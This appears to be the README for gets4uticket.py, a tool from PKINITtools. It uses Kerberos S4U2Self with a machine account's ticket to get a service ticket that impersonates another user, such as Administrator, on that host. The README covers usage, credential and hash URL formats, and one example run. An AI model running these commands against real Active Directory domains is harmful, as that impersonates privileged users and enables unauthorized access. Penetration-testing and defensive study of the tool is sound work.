gets4uticket.py - Gets an S4U2self ticket impersonating given user

Uses Kerberos S4U2Self to request a service ticket that is valid on the host for which you’ve obtained a certificate. This ticket can then be used to interact with the original host. This only requires a TGT for the machine account of this host. This TGT should be in a ccache file that you specify in the kerberos_connection_url. The only accepted kerberos_connection_url for this example is one containing a ccache file, so for example kerberos+ccache://domain.local\\victimhostname\$:[email protected]. The SPN should be a service name on the host you are impersonating, you can’t use this for delegation attacks (since it does not implement S4U2Proxy, there are plenty of tools already for that).

Installation

Install PKINITtools

Usage

gets4uticket.py [-h] [-v] kerberos_connection_url spn targetuser ccache

Flags

positional arguments:
  kerberos_connection_url
                        the kerberos target string in the following format kerberos+ccache://domain\user:file.ccache@<domaincontroller-ip>
  spn                   the service principal in format <service>/<server-hostname>@<domain> Example: cifs/[email protected] for a TGS ticket to be used for file access on server "fileserver". IMPORTANT:
                        SERVER'S HOSTNAME MUST BE USED, NOT IP!!!
  targetuser
  ccache                ccache file to store the TGT ticket in

options:
  -h, --help            show this help message and exit
  -v, --verbose

==== Extra Help ====
   kerberos connection url secret types: 
   - Plaintext: "pw" or "pass" or "password"
   - NT hash: "nt"
   - RC4 key: "rc4"
   - AES128/256 key: "aes"
   - CCACHE file: "ccache"
   - SSPI: "sspi"
   
   Example:
   - Plaintext + SOCKS5 proxy:
      kerberos+password://domain\user:[email protected]/proxytype=socks5&proxyhost=127.0.0.1&proxyport=1080
   - Plaintext:
      kerberos+password://domain\user:[email protected]
      kerberos+pw://domain\user:[email protected]
      kerberos+pass://domain\user:[email protected]
   - NT hash:
      kerberos+nt://domain\user:[email protected]
   - SSPI:
      TEST/user/sspi:@192.168.1.1
   - RC4 key:
      kerberos+rc4://domain\user:[email protected]
   - AES key:
      kerberos+aes://domain\user:[email protected]
   - CCACHE file:
      kerberos+ccache://domain\user:[email protected]
   - KEYTAB file:
      kerberos+keytab://domain\user:[email protected]
   - PFX file:
      kerberos+pfx://TEST.corp\Administrator:[email protected]/?certdata=test.pfx
   - PFX string (b64):
      kerberos+pfxstr://TEST.corp\Administrator:[email protected]/?certdata=BASE64DATA
   - No auth (preauth not req):
      kerberos+none://TEST.corp\[email protected]/

Examples

(PKINITtools) user@localhost:~/PKINITtools$ python gets4uticket.py kerberos+ccache://testsegment.local\\s2019dc\$:[email protected] cifs/[email protected] [email protected] out.ccache -v
2021-07-28 10:09:13,687 minikerberos INFO     Trying to get SPN with [email protected] for cifs/[email protected]
2021-07-28 10:09:13,695 minikerberos INFO     Success!
2021-07-28 10:09:13,696 minikerberos INFO     Done!